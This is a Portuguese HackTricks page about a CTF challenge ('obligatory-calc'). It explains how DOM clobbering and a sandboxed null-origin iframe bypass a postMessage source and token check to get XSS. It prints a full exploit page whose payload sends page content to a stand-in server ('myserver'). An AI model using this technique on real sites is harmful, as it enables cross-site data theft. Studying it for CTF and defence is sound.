Bypassing SOP with Iframes - 2

Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Você trabalha em uma empresa de cibersegurança? Você quer ver sua empresa anunciada no HackTricks? ou quer ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Confira os PLANOS DE ASSINATURA!
Descubra A Família PEASS, nossa coleção exclusiva de NFTs
Adquira o swag oficial PEASS & HackTricks
Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-me no Twitter 🐦@carlospolopm.
Compartilhe seus truques de hacking enviando PRs para o repositório hacktricks e repositório hacktricks-cloud.

Iframes em SOP-2

Na solução para este desafio, @Strellic_ propõe um método semelhante à seção anterior. Vamos verificar.

Neste desafio, o atacante precisa burlar isso:

if (e.source == window.calc.contentWindow && e.data.token == window.token) {

Se ele fizer isso, ele pode enviar um postmessage com conteúdo HTML que será escrito na página com innerHTML sem saneamento (XSS).

A maneira de contornar a primeira verificação é tornando window.calc.contentWindow undefined e e.source null:

window.calc.contentWindow é na verdade document.getElementById("calc"). Você pode sobrescrever document.getElementById com <img name=getElementById /> (observe que a API Sanitizer -aqui- não está configurada para proteger contra ataques de sobrescrita de DOM em seu estado padrão).
Portanto, você pode sobrescrever document.getElementById("calc") com <img name=getElementById /><div id=calc></div>. Em seguida, window.calc será undefined.
Agora, precisamos que e.source seja undefined ou null (porque == é usado em vez de ===, null == undefined é True). Conseguir isso é "fácil". Se você criar um iframe e enviar um postMessage dele e imediatamente remover o iframe, e.origin será null. Verifique o código a seguir

let iframe = document.createElement('iframe');
document.body.appendChild(iframe);
window.target = window.open("http://localhost:8080/");
await new Promise(r => setTimeout(r, 2000)); // wait for page to load
iframe.contentWindow.eval(`window.parent.target.postMessage("A", "*")`);
document.body.removeChild(iframe); //e.origin === null

Para contornar a segunda verificação sobre o token é enviando token com o valor null e tornando o valor de window.token undefined:

Enviar token no postMessage com o valor null é trivial.
window.token ao chamar a função getCookie que utiliza document.cookie. Note que qualquer acesso a document.cookie em páginas de origem null aciona um erro. Isso fará com que window.token tenha o valor undefined.

A solução final por @terjanq é a seguinte:

<html>
<body>
<script>
// Abuse "expr" param to cause a HTML injection and
// clobber document.getElementById and make window.calc.contentWindow undefined
open('https://obligatory-calc.ctf.sekai.team/?expr="<form name=getElementById id=calc>"');

function start(){
var ifr = document.createElement('iframe');
// Create a sandboxed iframe, as sandboxed iframes will have origin null
// this null origin will document.cookie trigger an error and window.token will be undefined
ifr.sandbox = 'allow-scripts allow-popups';
ifr.srcdoc = `<script>(${hack})()<\/script>`

document.body.appendChild(ifr);

function hack(){
var win = open('https://obligatory-calc.ctf.sekai.team');
setTimeout(()=>{
parent.postMessage('remove', '*');
// this bypasses the check if (e.source == window.calc.contentWindow && e.data.token == window.token), because
// token=null equals to undefined and e.source will be null so null == undefined
win.postMessage({token:null, result:"<img src onerror='location=`https://myserver/?t=${escape(window.results.innerHTML)}`'>"}, '*');
},1000);
}

// this removes the iframe so e.source becomes null in postMessage event.
onmessage = e=> {if(e.data == 'remove') document.body.innerHTML = ''; }
}
setTimeout(start, 1000);
</script>
</body>
</html>

Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Você trabalha em uma empresa de cibersegurança? Quer ver sua empresa anunciada no HackTricks? ou quer ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Confira os PLANOS DE ASSINATURA!
Descubra A Família PEASS, nossa coleção exclusiva de NFTs
Adquira o swag oficial PEASS & HackTricks
Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-me no Twitter 🐦@carlospolopm.
Compartilhe seus truques de hacking enviando PRs para o repositório hacktricks e repositório hacktricks-cloud.

PreviousBypassing SOP with Iframes - 1 NextSteal postmessage modifying iframe location

Last updated 3 months ago